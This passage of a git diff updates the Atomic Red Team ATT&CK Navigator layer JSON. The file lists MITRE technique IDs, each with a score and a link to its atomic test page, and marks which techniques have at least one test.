T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index e7753f83..9124ae71 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"c